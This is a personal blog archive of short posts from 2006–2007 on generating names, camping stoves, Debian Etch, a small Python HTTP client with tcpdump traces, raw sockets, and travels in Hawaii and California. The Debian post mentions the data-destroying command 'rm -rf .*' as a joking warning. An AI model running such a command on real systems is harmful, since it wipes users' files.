2007-02-12 Finding good names

It happens all the time. I am about to start a new project and I can't find a good name. I could postpone the decisions until publication. With my completion rate, that would save me a lot of thinking. Still, the name of a project, a programming one at least, is scattered all over the place from the start: you create a tree in your cvs/git/svn, you create a package/namespace/module in your programming environment and you write the project's name in the documentation (at least you intend to). You can change the name later but you save a lot of work if you start with the right one.

There was a time when you could pick a random word from the dictionary and be done with it. Today, it seems, all the real words are taken, even vellication. Here I use a widely accepted definition of "taken": is the .com owned by someone else. There are other root domains (.net, .org, .info) but the squatters bought the most of the dictionary there too. If we don't limit ourself to the dictionary, why should we after all, combinatorics saves the day. There are just to many ways to put letters together. Squatters can buy all the tree letter acronyms but that's as far as they can get.

My first idea was to use googleability. Googleability, you'll recall, is the quality of being searchable, and found, on Google. Words like "sun", "act" and "run" have low googleability. They are in the 0.1% of three letter words with the most Google hits. At the other end of the spectrum, you get words like "bxu" and "yzo" that no one seem to put on his website (thought this self referential sentence invalidates its claim). If your friend tells you about YZO's new BXU, you can google it and you will find the right website. Googleability works but I wasn't the first to think about it. Almost all pronounceable three and four letter words with high googleability have a registered .com. Exploring longer words is a challenge. Google doesn't like scripts. You have to fake a browser and to limit the query rate. I didn't. I seriously considered finding a new Internet service provider when I noticed that Google had banned me.

What is pronounceable? Some people can pronounce "w00t" and "pwned" but most can't. If you limit yourself to alternation of vowels and consonants you will get pronounceable words but you will miss really good ones. On the other hand, allowing a sequence of more than one consonant will yield words like "evzupricb". I was looking for a quality more subtle than just being pronounceable. Some words are warm, others are frigid. Anglo-saxon and Norse words, for example, are more visceral than Latin ones. The battles against the Orcs are not fought in Polytanie, they are fought in Azeroth. How could I capture this warmth, this evasive quality with the taste of raw meat?

Actually, that's quite simple. A lively text will contain more warm words than frigid ones. Extracting the warmth is just a matter of measuring the probability of going from one letter to the other, including the probability that a given letter will end the word. A probabilist engine trained on the King James Bible will produce a lot of old English sounding words. One last change is required though: the probability of going from "l" to "l" will be way to high and you'll end up with words like "alllerit". The full transition probability with a two letter prefix could be large but only recording the transitions that you actually see generates a transition table under 100k. And it makes sense to do so. In the King James Bible, the only thing that can follow "pr" is a vowels. Furthermore, "pr" will never be at the end of a word, unlike "ps", which is last 80% of the time.

Now that we have the rules to generate as many vivid words as we want, we just need to keep trying until we find one for which the .com is still available. It is good? Judge for yourself, as I write this, those words are available in at least two of the four main top level domains: abongs, abuted, affere, againg, amigeth, andreph, becomoses, becured, beffer, behosest, brisraell, challed, chout, egived, egyptayed, fatieford, fifies, flooses, gaing, humple, israndee, istion, joyether, judan, judgenst, kethich, morthers, moshall, offeruiled, prieven, reoph, rient, rought, sayints, shaarding, shaith, shalleak, sheaveth, speople, spild, tathild, therecaust, theried, thits, togypt, waying, whing, whings, whous, womenty. Nothing was hand picked, just random generation. We get names but we also get verbs, adverbs and adjectives. I wonder if this is how they create artificial languages.

Changing the training set for the weekly top 100 on Project Gutenberg produces a contemporary lexicon: adays, amalls, anned, appeance, appene, bectinty, cassion, descess, droort, eliked, exterid, flonst, hered, honsir, humety, immang, intanch, jused, losed, maketter, mathere, matinswer, opecous, othersuld, pears, pened, plorn, preathilly, prowhich, reard, reentich, retcheing, scrove, shoul, soothred, soubjes, spilly, squoully, therigh, throppen, unlip, vidded, wanked, whallon, wherents, whicars, whide, wouldishon, woute, youthered. Not as exotic but still credible.

I still don't have a magic trick to pick a project name but at least I can now limit the search space. I let my computer looking for words are taken during the night and I contemplate are few pages of candidates in the morning. My name generator even found its own name. Here is Yould. Now I need to find good texts for the training set.

2007-02-08 On Firestarters

There I was, overlooking the Kilauea, one km above sea level, 3700 km from the closest continent, in the middle of a vast treeless lava field. There was a pleasant yet strong breeze making the tropical Sun easier to stand. It was lunch time and I was looking forward for a hot meal after all the rough hiking.

I was well prepared with my, mostly homemade, ultra-light backpacking gears: Cobra Stove, aluminum foil wind screen, mesh pot stand and camping saucepan. Everything was perfectly calculated: with 175ml of alcohol I was good for six meals, all what was needed for an overnight back-country trip with a generous margin for errors. I had a watertight matchbox with a capacity of 20, that was more than enough. Right?

Compared to other Zen Stove designs, the Cobra is more fuel efficient. Construction is as simple but you need a primer pan (video by Don Johnston) in order to reach the inner pressure that makes the jets burning by themselves. The principle of the primer pan is simple: you let your stove sit in a (really small) bath of alcohol that you set ablaze. If the bath is too small, the stove won't get hot enough and you have to repeat the procedure, no big deal here. If the bath is too big, the stove gets too hot and you might have noticed that design don't include a relief valve. If you are lucky, you waste all your fuel in a few seconds of 50 cm flames, otherwise the stove blow up. Obviously, I tend to make small primer baths.

Back to Kilauea, first match: blown by the wind, second is OK but the primer pan gets blown off, everything is fine with the third one, except that the primer pan was too small after all... Simple math: 4*6=24; the match box won't do the trick and I must find a replacement. If you think that I could just carry a 2$ disposable cigarette lighter, you are definitely not part of the target audience and you can safely stop reading now. If your first thought that I just had to use my hammock ropes to make a bow and start a fire like the Indians used to, read on.

In high-school, I listened to Manowar. There was this song, Black Wind, Fire and Steel. I'm still not sure about what it was supposed to mean but you have to admit that it is catchy to put the key material of the industrial revolution and the fetish of all pyromaniacs in the same sentence. I was checking Think Geek, actively procrastinating, when I first saw a something called Swedish Firesteel. How could something called Firesteel not be great? I mean, something with sparks at 3000°C, that works when wet, in any weather, at any altitude. As solid packages for raw power goes, this must be right next to energon cubes. I needed to replace the match box anyway; that was enough for an excuse.

I was able to get the demo from my favorite army surplus for 10$. Every time I get into this store the dealer goes "where did you get this old Russian army coat?" and as usual, I remind him that he sold it to me. That seems to please him and he always offer me a bargain on whatever I came looking for, as long as I pay cash... My Firesteel looks similar to the one on Think Geek except that the provided striker is a plain rounded rectangle, not the serrated one. As far as I can tell, this is an older model by Light My Fire: web stores advertise Light My Fire's Firesteels with the model I have pictured.

This Firesteel is nice. It only weight 75 g and you do get a lot of bright sparks with each stroke of the striker, even when wet. Sparks fly about 20 cm away; lighting a primer pan with it is trivial. But, to inflame something more stable than methanol is something else. My first attempts to light paper took an average of 50 strikes. Toilet paper was easier to light with an average of 25 strikes. How can something that burns at 3000°C not light paper instantly? We should not confuse heat, the quantity of energy, and temperature, the heat per molecule. The few molecules in the bright sparks have a hight temperature but they don't carry much heat. Using my knife as a striker did produce more sparks and makes lighting paper a lot easier. The problem is that rubbing a knife against a metal rod destroys the sharp edge in no time. A simple solution is to carry a sacrificial edge. Fair enough. With a little filework I gave a crude edge to the striker provided with the Firesteel. The result is pretty good. I can light paper with an average of five strokes, toilet paper usually burn in two strokes. The striker is not made of tempered steel and it losses its edge faster than a knife. Fortunately, the crude bevel takes no time reshape. Rubbing against a rock would be enough; no need to add a file to the ultra light backpacking gears. The poor performance of the plain striker is probably why Light My Fire now provides a serrated one.

Even with the improved striker, you need to carry something easy to inflame. Light My Fire sells Maya Dust, a convenient tinder but also the acknowledgment that the Firesteel is more related to flint and steel than to a modern firestarter that combines knowledge of piezoelectricity with advanced polymers into a pocket small package: the cigarette lighter. The state of the art cigarette lighter also comes from Sweden; it's the Silva Storm Helios. Why do Swedes come up with all the high-tech firestarters? It probably gets really cold there. That or too much Swedish metal turned the dwellers into arsonists.

2007-01-03 Etch

Etch have been frozen for about a month now and will soon become the new stable Debian. I used to run Sarge (the current stable) on my desktop while it was still in testing and since I liked the experience I decided to give Etch a try during the winter break.

Among the major improvement there is now a graphical installer and AMD64 became an official architecture. Aside from that all the packages are upgraded to bleeding edge versions and there are quite a few new comers. A full binary download is now 21 CDs, double that if you want the sources. All of those packages have now passed the freeze so we can expect Etch to be the most complete distribution ever released thought Gentoo must not be too far.

The install went smoothly. The console install is pretty much the same with the "normal" mode asking even less questions than before. No doubt, anyone can install this distribution. The graphical install is cute but the transitions are sometimes strange and the "next" button don't alway do what one would expect. Hopefully this will be fixed before the release. I had no problem to setup a software RAID over SATA at install time with / and /boot on LVM on top of the RAID. I heard people have had problems with that setup with other distros, so far didn't notice any glitches. Of course I didn't burn the 21 CDs, the usual way to install Debian is to burn only the "netinst" CD and to use the excellent apt tool to install the packages from the network when you need them. Apt performs all dependency calculations and compared to yum and urpmi, it is blindingly fast (diclaimer: the last time I used urpmi was a few years ago, it might be better now).

Some packages still present a few minor bugs but the overall experience so far is great. The new KDE 3.5.5 now feature text-to-speech integration. KDE must have been tuned lately because it feels really snappy and responsive, even over XDMCP. I was able to keep /home unchanged and everything just worked. It's good to know that systems with many more users are likely to upgrade smoothly because no one likes to nuke his .kde when he arrives on Monday morning. By the way, rm -rf .* is never a good idea (someone knows what I'm talking about).

For a system that isn't mission critical, I think that Etch is ready now and I encourage everyone to try it. Debian Etch is a flexible meta distribution that can be shaped into either a desktop or a server with loss of usability or stability.

2006-12-29 Fract and Music

One problem with a really stable system is that you don't notice when your init scripts are broken. Fract have been down for the last few days. It happened that it wasn't properly restarting after a power cycle... It should be OK now but don't hesitate to annoy me by email if things aren't working as expected.

Now lets talk about music. Most music today is complete crap. Musicians stick to "the formula", always the same playtime, the same instruments, the same verse/chorus alternation, the same... The best artists can produce excellent stuff but for some reason they won't refrain from publishing the crap too, and they publish a lot of it... Take Wumpscut as an example, Draussen and Totmacher is among the most brilliant music since Beethoven but if you are dumb enough to just drop the CD in your player and push play you'll fall on crap like Wolf and Mortal Highway. Worst, there is plenty of random noisish padding like Phase Shifter and Beleive in Me. Am I suppose to care that you recorded the sound test of your latest reverb pedal? This guy must be smart, can he really not tell what is crap and what is good?

And if you pick a random artist, the good/crap ration drops really fast. The obsolete CD distribution is probably to blame for that. Would you pay 20$ for 2 songs? Probably not, nevertheless people like to pay 20$ for 2 good song plus a bunch of padding tracks. But what do you expect, that people won't notice how low the good/crap ration is? No wonder that people turned to file sharing and Internet stores. And there is the RIAA, who made themselves obsolete, who prefer to sue people instead of adapting. RIAA try to destroy the public domain and the the fair use in hope that people won't notice the extent of the lie.

To boycott the RIAA is a duty, if we let them have their way they'll destroy the concept of folklore and free culture. But they more of less control radio stations and with the current good/crap ratio radios play a really important filtering role. When I first tried to get RIAA free music the only sources were managed by relativist utopians who believed that all music was created equal. The good/crap ratio was lowest than if you had bought random CDs from a music store. After all record companies will at least try to put one "good" song per CD.

So I decided to listen to no music instead of listening to RIAA and/or crap music. Now let's all rejoice because I finally found a RIAA free radio that will cherry pick the good stuff and filter out the crap. Epiphany Radio plays really good ambient techno and all the music is certified 100% RIAA free. Most songs are lyrics free which makes Epiphany a pretty good background when working. The 128k stream is reliable with really few glitches. So far I'd rate it 7.5/10. At some point people will hopefully stop releasing the crap stuff, Beethoven didn't release his crappy experiments after all. Until then we will probably need radios.

Where do you find your RIAA free, non-crap music?

2006-12-07 CRA Outstanding Undergraduate Award

The Computing Research Association promotes research in computer science and related fields. At first I was disappointed to only get an honorable mention for its outstanding undergraduate award but since the announcement I received several emails from top tier universities inviting me to apply to their grad school. I guess an honorable mention is honorable after all. Now, how am I going to cope with all the paper work...

2006-11-29 HTTP Illustrated

In TCP/IP Illustrated, Richard Stevens describe the TCP/IP protocol stack by generating interesting situations and looking at what happens on the wire with tcpdump. Don't look for pretty illustrations, "illustrated" here means "by examples".

This is an excellent set of books, a bit dated but the technique lives on. Learning this stuff by just reading the RFCs must be painful. For some reason the RFC editors want the official documents to be plain ASCII with manual page breaks. For the nostalgic it must feel good to read document in 2006 that look exactly like a bunch of typewritten pages from 1966. The RFC editor even recommends using troff to "typeset" the document... Let's hope that they hear about Docbook one of these days. OK Docbook is not that nice, we can blame XML's verbosity for most of the problems and the rest of the blame goes to the extremely fragile tool chain that is considered "standard" on most GNU/Linux distributions. But at least with Docbook you can hack your own tool chain and you'll end up with stuff that don't look like crap.

In the mean time fooling around with the protocols is fun. I had this friend who really liked to send emails in raw SMTP by telneting to his mail server. I'm still not sure if it was because he like that or because XFree86 was still compiling on his gentoo box (or was it a LFS?). Nevertheless, now I understand why he managed to get the big bucks as a sysadmin while I wasted my time coding reporting code for balance sheets. I'd link to his website but he tells me that he don't have one anymore, it had something to do with compilations thats never finished...

So I started to telnet to port 80 on my favorite webservers. HTTP is a bit verbose so I soon opted to hack a micro HTTP client. Thanks to the socket module I can do that in a real small python script:

#!/usr/bin/python
import socket as s
import sys
CHUCK = 8000

if len(sys.argv) != 2:
    print "USAGE: %s host" % sys.argv[0]
    sys.exit()

host = sys.argv[1]
sock = s.socket(s.AF_INET, s.SOCK_STREAM)
sock.connect((host, 80))
sock.send("GET / HTTP/1.1\n")
sock.send("Connection: close\n")
sock.send("Host: %s\n\n" % host)

done = False
chunks = []
while not done:
    buf = sock.recv(CHUCK)
    chunks.append(buf)
    print str(buf)
    print "** read %4d bytes" % len(buf)
    if len(buf) == 0:
        done = True
print "DONE"

# headers are sometimes interesting
for l in "".join(chunks).split("\n"):
    if not l.strip():
        break
    print l

Anything interesting that wasn't expected? You bet! First of all the W3C pretend that you should always be able to use HTTP 0.9 to some extent. In 0.9 you can fetch foo.html with GET foo.html\n\n and that's it: not headers or funny stuff. Well forget about that, no one cares about retro compatibility and they'll close the connection as soon as you try. This isn't really a problem, just a really check between what you read in textbooks and what happen on the wire. And then there is this persistent connection thingy. If you are a web browser that's probably a good thing but if you are just fooling around, you really want to get rid of it: Connection: close\n

All respectable webservers won't care if you prepend www or not. Half of then redirect to www if you don't prepend, the other half redirect to the straight domain of you prepend. A tiny fraction really don't care and spit out the content right away. Another tiny fraction really want you to prepend and yell at you if you don't. I must be missing something because www seems obsolete to me.

You can learn a lot about the structure of generating code on the webserver just by looking at how the stuff is sent to you:

$ python mini-web.py www.uqam.ca
** read 1440 bytes
** read 1440 bytes
** read 1440 bytes
** read   45 bytes
** read 1440 bytes
** read 1440 bytes
** read 1332 bytes
** read 1440 bytes
** read 1440 bytes
** read  727 bytes
** read    0 bytes
DONE

Here the server spit out the content in three bursts. With close inspection we see that the bursts corresponds to the usual web page division: common head, inner content, common footer. But why chucks of 1440 bytes? Here is a hint: I'm connected with DSL. Here is another hint, tcpdump has this to say:

# tcpdump port 80
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
11:53:33.437125 IP ogre.33972 > girofle2.telecom.uqam.ca.www: 
                S 2059998486:2059998486(0) win 5840 
                <mss 1460,sackOK,timestamp 468230511 0,nop,wscale 2>
11:53:33.481900 IP girofle2.telecom.uqam.ca.www > ogre.33972: 
                S 3362836129:3362836129(0) ack 2059998487 win 25920 
                <nop,nop,timestamp 3450314929 468230511,
                 nop,wscale 0,nop,nop,sackOK,mss 1460>
11:53:33.481948 IP ogre.33972 > girofle2.telecom.uqam.ca.www: 
                . ack 1 win 1460 
                <nop,nop,timestamp 468230556 3450314929>
11:53:33.482148 IP ogre.33972 > girofle2.telecom.uqam.ca.www: 
                P 1:16(15) ack 1 win 1460 
                <nop,nop,timestamp 468230556 3450314929>
11:53:33.518047 IP girofle2.telecom.uqam.ca.www > ogre.33972: 
                . ack 16 win 25920 
                <nop,nop,timestamp 3450314933 468230556>
11:53:33.518102 IP ogre.33972 > girofle2.telecom.uqam.ca.www: 
                P 16:53(37) ack 1 win 1460 
                <nop,nop,timestamp 468230592 3450314933>
11:53:33.568422 IP girofle2.telecom.uqam.ca.www > ogre.33972: 
                . ack 53 win 25920 
                <nop,nop,timestamp 3450314938 468230592>
11:53:33.624884 IP girofle2.telecom.uqam.ca.www > ogre.33972: 
                . 1:1441(1440) ack 53 win 25920 
                <nop,nop,timestamp 3450314943 468230592>
11:53:33.625055 IP ogre.33972 > girofle2.telecom.uqam.ca.www: 
                . ack 1441 win 2184 
                <nop,nop,timestamp 468230699 3450314943>
11:53:33.629372 IP girofle2.telecom.uqam.ca.www > ogre.33972: 
                P 1441:2881(1440) ack 53 win 25920 
                <nop,nop,timestamp 3450314943 468230592>
11:53:33.629448 IP ogre.33972 > girofle2.telecom.uqam.ca.www: 
                . ack 2881 win 2908 
                <nop,nop,timestamp 468230704 3450314943>
11:53:33.634043 IP girofle2.telecom.uqam.ca.www > ogre.33972: 
                P 2881:4321(1440) ack 53 win 25920 
                <nop,nop,timestamp 3450314943 468230592>

Specifically, look at the SYN packet (ogre is my workstation): mss is 1460 and a TCP header is 20 bytes when there are no options. Everything adds up and we notice that splitting the packets is slow enough for the script to have time to print to the console before another packet is read. From this we can conjecture that a bigger mss would probably crank-up throughput significantly (or that I need a faster link). Initial handshake took 50ms which isn't that much but this is still something that is saved for free from subsequent GETs with persistent connections.

Anything else? Not really, except maybe that there are Easter eggs in the Slashdot http headers. Yahoo.ca replies a 404 on / about 30% of the time. I guess these guys don't care about monitoring... All of this is a lot of fun isn't it? How I wish I had done that before my trip to Silicon Valley!

; )

2006-11-22 Raw Sockets

Python is sometimes described as "just a scripting language". This show how much some people want to separate all programming languages into two or three categories without even knowing what they are talking about.

One nice thing about Python is the way it exposes the Unix internals. Almost all the system calls have bindings with interface so close to C that you can follow the man pages when using them. Of course, efficiency is not always there but you can sketch out a solution in no time and fall back to C when the profiler tells you to do so.

The socket API is exposed in all its gory details and it possible to do raw sockets: to build each packets byte by byte including the headers. The C API uses unions that are casted as struct when an individual field needs to be set and casted as byte array when written on the wire. The Python API uses string objects which makes it a bit painful to set a single field but poses no problems when building the packets from scratch.

As an example, its is possible to implement ping in just over 100 lines. Using time.time(), we don't have enough resolution to make accurate reading for round trips under ~5ms but it still works pretty much as expected otherwise. Note that if you are to try it you'll need to be root since it's the only way to access raw sockets (the real ping is setuid).

A new non baroque language should aim to be as cleaver as Python in exposing the host platform internals. CL+UFFI is not bad, SBCL's sb-posix is especially nice. Skilled use of macros makes the whole binding set easy to read and to maintain:

       (define-call "link" int minusp (oldpath filename) 
                                      (newpath filename))
       (define-call "lseek" sb-posix::off-t minusp (fd file-descriptor) 
                                                   (offset sb-posix::off-t) 
                                                   (whence int))
       (define-call "mkdir" int minusp (pathname filename) 
                                       (mode sb-posix::mode-t))
       (define-call "mkstemp" int minusp (template c-string))
       (define-call "sync" void never-fails)

2006-11-21 San Francisco

I spent a few days last week in the San Francisco Bay area. For a geek, visiting the legendary Silicon Valley is a pilgrimage.

Paul Graham has a few interesting essays on what might make the magic happen in Silicon Valley. Indeed, when you are there you can feel that some magic is going on but it is incredibly evasive, you can't point at it or describe it but it's there. Someone can cross the whole valley on the 101 or even on El Camino and all what you see is an endless sprawl. The weather is nice but we are still in Suburbia.

When you visit the computer history museum, the power of the valley starts to unfold. As the guide walk you through the landmark artifacts of the computer world he will add "[...] was developed just here down the road.", "[...] not far from here in Stanford." or "[...] and he was here last year and told us a story about this computer.". Some companies have really cool offices (taken from here), people move around with kick scooters and all the big players have offices in the area.

Why they go to the ugly sprawl instead of San Francisco is still a mystery to me. San Francisco is a great city. Being on the peninsula keeps the whole thing compact and compact cities like Montréal are more pedestrian friendly. You can just wander around and stop by an Irish pub or one or the numerous sea food restaurant in the Fisherman's Wharf. There is an endless downtown beach with huge waves but the water is a bit cold so surfers need a wetsuit.

A compact city don't mean that you are always trapped between sky scrapers. The Golden Gate Park offers a peaceful environment that would require more than one day to explore. The city has numerous fairly steep hills and parking a car there must be a challenge, I imagine the balancing feat required to park a motorcycle.

Paul Graham probably score a point when he conjectures that you need great universities to reproduce Silicon Valley. When you walk on the Stanford and Berkeley campuses you feel a majestic excellence. There are Rodin statues and stone arcades all over the place. When you are there, you want to be worthy of this prominence. Even if you are just passing by.

2006-11-11 Walking on Lava

It is kind of time for another round of pictures from Hawaii. Since everyone prefer lava and since Hawaii in the only place in the world where tourists freely roam on an active volcano, only a few centimeters from glowing lava, I shall start with the pictures of my hikes on the Kilauea.

But first, since this is a geek's blog, I will do some technical rambling. Digital camera manufactures boast that their products can capture a large amount of megapixels. Is this any good for the user? I say hell no! I'll be talking trough my hat since I only used one digital camera seriously but I received enough pictures from others that I'm confident that what I say is true.

Do you recall those new parents who sent you an email with only a few pictures totaling several megabytes? Why do they do that? Don't they know that you are using a monitor that can't display such a large image? Do they expect you to zoom in on this youngling to convince yourself that its eyes are closed? Do they expect you to print this picture? A cheap printer with cheap paper can't match this resolution and sorry buddies, I won't take your pix to a print shop. I'm not saying that parent should not send emails with pictures, what I'm saying is: please, no pictures larger that 300k!

Have you ever tried to zoom on the youngling to convince yourself that its eyes are closed? I'm pretty sure that no parents have because they would instantly stop sending those large files. The crappy digital camera that we have save pictures in jpeg with compression aggressively cranked-up. You might recall that jpeg is a lossy compression format. That means that when you crank it up, you loose something in your picture and it gets replace by an ugly artefact that is easier to compress. On all the cameras that I saw, it wasn't possible to save in png or to tune the jpeg compression so your only hope to get a clear picture is to zoom out. Here is an example of a perfect image, the same image with conservative jpeg compression, with "standard" compression and with aggressive compression.

You could perform the same experiment on your own images with something like this:

     for c in 90 70 50; 
       do convert -quality $c shoe-wrack.png shoe-wrack-$c.jpg;done

As you can see, jpeg compression destroys precisely what makes an image great: the fine details and the smooth gradients. The images produced by your digital camera are useless at the resolution they are saved at but you can still salvage them for publication now that you know how jpeg works. The idea is to zoom out and to average the resulting pixels with many pixels from the large images. I don't intend to have you code anything yet since I'm only saying that you should please rescale your images before you reach your favorite email client. I expected an easy path to batch rescaling a bunch of pictures and there is one but the command is quite obscure:

     rename 'y/A-Z/a-z/;s/hpim//' *.JPG
     find -name "*.jpg" -exec convert -affine "0.5,0,0,0.5,0,0" \
                                      -transform -quality 85 {} {} \;

I promise that if you run this command on anything produced by your crappy digital camera no one will mind that you send him several pictures of your new born.

So, how about lava you ask? Yeah, I wanted to publish the whole thing but I was stuck with several hundred megabytes of jpeg compression mess. Once I made my mind that there wasn't anything that I could do with the hi-res images, everything was so simple: I could just pack all the images in a tarball and let you enjoy the lava-pack-1. Note that there is no lava-pack-2 but who knows, I might return to Hawaii one of these days. Also noteworthy is the fact that the latest version of tar auto detects the compression algorithm. That means that if you are running a non-baroque version of GNU/Linux you can just type

     tar -xvf lava-pack-1.tar.bz2

instead of

     tar -zxvf lava-pack-1.tar.bz2 # argh, error!
     tar -jxvf lava-pack-1.tar.bz2 # finally!

In this picture pack you will find several pictures taken around the Kilauea during August 2006. The pictures up to 0327 were taken during the field trip organized by the CASS. I I liked the Big Island so much that I went back for a few days after the CASS. The rest of the pictures are from this second trip. The weather is great in Hawaii and there are no nasties: serpents, mosquitos, jehova witnesses, ... So I went camping with nothing more than my hammock, a rain poncho that doubled as a tarp and my zen stove. Mine is a Cobra, completely pressfit without glue or top screw but with inner packing because my previous stove shoved how bad a spilling can get.

I used a travel hammock from hammocks.com . This hammock isn't as comfortable as a Mayan but it's still better than self inflatable matresses and probably better than most beds. It will pack really tight in a small sack and makes a pretty good travel companion. The hammock is pretty much waterproof so when it rains, it will collect water an funnel it up to your butt. The poncho wasn't large enough to cover the whole thing so next time I'll bring a larger tarp. The Kilauea is 1250 meters above sea level. It can get chill at night but a cheap sleeping bag is definitely enough. The main concern should be drinkable water: in Hawaii the sun shines hard and when you walk on a pitch black lava field you get thirsty fast. The Volcano Park has several drinking fountain so you rarely need to carry more than 2 litters.

When paying for entrance in the Volcano Park you can camp in a nearby campground or go for the real thing and register for back country camping. I tried both and back country is definitely worth it but it's not for the faint of heart. You have to hike for at least an hour on the lava field with no indication except an occasional pile of rock. Once there you have a perfect starry nigh with glowing red lava all over the horizon line.

The lava field is surrounded by a giant fern forest so you can't hang a hammock unless you reach the right spot. Don't even think about pitching a tent on the lava field, this stuff is sharp even though it doesn't look that way and anyone who touches it end up with a bleeding hand.

The Volcano Park is great for interpretation. You can see sulfur banks, lava tubes and lots of helpful signs but if you want to get close to the flowing stuff and if you want to see lava cascades, you need to reach the Kilauea from the Pahoa side. I was a bit adventurous and I got caught between lava fingers. As long as you have the wind on your back, you can walk about 30 cm from the active flow. When the wind blows the other way around (or even just stop blowing), heat is unbearable and sulfuric gasses are suffocating. When I got trapped could have walked back but I was low on water and after a few hours looking at lava you really feel that you understand it (OK sulfur might have something to do with it).

The old lava is pitch black. The recent one is kind of dark silvery. As long as you are on the black stuff you are safe (well, you are still on an active volcano). It gets tricky if you want to cross the silvery stuff. Really fresh lava has a porous glassy appearance and as it cools down, it cracks and small chips fly away. So I made my way jumping from a cracked silvery patch to the other. At the end I could feel intense heat from the sole of my army boots but I was back on a black patch with the wind on my back. I guess that running shoes would have melted, we don't pay enough attention to the melting point of the sole when we buy footwear.

In case you are wondering, when the lava falls into the ocean it instantly explodes into tiny fragments that gets washed away for a few miles where it forms black sand beaches.

Thats it for the lava stories (unless you pay me a beer for a live summary), stay tuned for more tales of Hawaii!

2006-10-04 On Invocations

There is no doubt that all programming language have problems and that a new one is needed as soon as possible. Once someone has an idea of what he want his language to be, he need to write either a compiler, an interpreter or both. You don't see pure interpreters that much these days, most language implementations at least compile to byte code. Though the principle of a compiler is simple, we see them as obscure forgotten charms carefully crafter by wizards with powerful incantations.

A compiler just translates the text of a program in language A into a program in language B. Technically, the lexer split the program into tokens. The parser then build a tree with the tokens and give this tree some meaning, that's the abstract syntax tree (AST). Finally the code generator walk the tree and print all the nodes in language B.

For a really simple language a compiler will fit in a few hundred lines. It gets tricky when you want to make an interesting language. For the language to be fast you need to transform the AST to eliminate slow operations. Such optimizations include loop unrolling, function call inlining and tail call eliminations. Interesting languages will also include a runtime environment: closures bindings, garbage collectors, type system, etc. The target audience for those topics being limited, there are no general resources where one could learn them. But if you ask in the right place, you might get a list of grimoires with many spells related to those dark arts.

Even though thaumaturgy will never be easy to learn, it is comforting to see that one can learn to conjure without going through apprenticeship. As the task of making a new programming language becomes surmountable, the question "What feature should a new language have?" becomes fixation, a puzzle that the warlock must solve to achieve wizardry.

2006-10-01 On Talks

Last sunday I presented my very first research paper in a scientific conference. That's an intimidating experience but I survived and I was able to expose our work properly, if I can trust the comments on my performance.

This is an aspect of scientific research that is completely skipped from science classes: how peer review works and why is it effective at separating science and religion? One first point to clear up is that there is absolutely no consensus. You often read non sense like "scientists believe foo and blah". Scientists don't believe anything and what explanation they use for natural facts is not the same for everyone. As an example, since it was a conference on comparative genomic, probably everyone in the room would agree that saying that a super being created all life as we know it around 10k years ago isn't a useful model to explain what we see. Even though the general idea that there is some evolution going on is considered reasonable, we had a presentation on how a tree of life don't make sense and the speaker wasn't torched as an heretic. He revised the model of the tree of life to include lateral gene transfer: something that we observe. This is exactly how science differ from religion. A dogma must be accepted or you are anathema. A scientific theory is exactly that: a theory. Everyone know that it is likely to miss some details and it's part of its goal to be revised.

But lets forget about evolution since it's just a theory and lets talk about the peer review process. Scientists, most of them working in universities and doing research to avoid students, do experiments and observe stuff. I use those terms loosely since doing experiment can be to benchmark a garbage collector or to attack the Riemann Hypothesis with differential geometry. Once in a while they publish what they found so they write a paper on it. It doesn't need to be a major breakthrough, just a little "hey look, making a bitmap of the memory heap allows us to collect garbage 3.8% faster." That way the common knowledge is documented and someone else working one garbage collectors will know that he should make bitmaps.

So far so good, but why can't you write a paper on how you can explain the whole universe with the action of an invisible pink unicorn? Hiding in labs isn't an efficient way to avoid students. They eventually learn that waiting at your office door won't work and then they find your lab and start to wait for you there. Some scientists studied the problem and found a better approach: just leave the city! So scientists organize scientific conferences in foreign cities. They gather there for a few days and enjoy free coffee and talk about how bad jet lag is. There is even an funny city selection algorithm that ensure that a conference on a given topic won't be in the same country the following year.

Scientists publish their papers in those conference, that way they have some excuse to have someone else to pay for the plane ticket (that someone is usually tax payers). But they don't want students to wait for them at the conference, so there is a selection committee. The selection committee is a bunch of scientists who published papers on the topic of the conference and who have the ungrateful task of reading all the papers and to: 1)reject anything that talks about unicorns, 2)tell which are the best so you don't have too much people. Yes there is another catch, if your paper is selected, you have to go on the stage and tell everyone what you did. Obviously you need to limit the number of presenters if you don't want your conference to last a whole month.

The conference organizers have a really good trick to motivate the selection committee: they publish who they are. Each paper is assigned a few anonymous reviewers but the whole selection committee is known. So if someone climb on the stage and talk about pink equidae, they all go down with him. And thats pretty much it. I mean, there is nothing else to prevent you to publish anything you want, you have to convince two of your tree reviewer that you don't talk about unicorns. An alternative approach is to bore them to death so they don't finish to read your paper but that's tricky since you more of less need to bore the audience to death during your presentation too.

"How about the presentation?" you may ask at this point. Well, once your paper is selected you are going to be published in the proceedings, the presentation is seen as a simple formality by many so they just send some random student on the stage (the rare students who discovered the research lab) while they enjoy free coffee. I think that in principle the presentation is supposed to expose in simple term what you found so people will want to read your paper or ask more questions during lunch break. In practice the schedule is extremely tight: 25 minutes for the talk and 5 minutes for questions. This is too short for anything but the most trivial work and without hope to have the message passed clearly the presenters just slam definitions and theorems on the screen while the audience nod pensively. Ok this isn't fair since a few presenters manage to distillate their results and to show just a few key aspects but clearly. There is also another path to publish your results: peer reviewed papers. Those are more of less like conferences but you don't have to do the talk. There is a selection committee and everything else. But since I'm writing about presentations I won't elaborate on those.

Learning is hard, its even harder when you don't control the pace. A lecture is inefficient to transfer knowledge. It achieves parallelism but the pace must be set too slow or too fast for most people. Good books are much more efficient, they let you go fast in the easy parts and slow in the hard parts. Unfortunately books are often written by lecturers and they have an implicit pace that will prevent the reader to adapt effectively. The Stanley books on combinatorics are so dense that you can't read more than a few pages per hour. Other books use so many words to describe simple stuff that you can read only the longs words without loosing much. When a book is longer than 700 pages, you should be suspicious. A really fat book on economics by Mankiw comes to mind. A talk in a conference is the worst you can expect: you have 25 minutes and you can't clarify botched aspects at the lecture the following week.

To pass the content as efficiently as possible a lot of time must be invested in preparation. I don't know if you get used to it but it seems that I spent nearly as much time preparing this 25 minutes talk than I spend looking for results. This sound quite inefficient to me. Just imagine all the stuff that we could find if all the people in the audience had twice as much time to do actual research. There isn't much that I can do to fix how we do science so lets talk about talks.

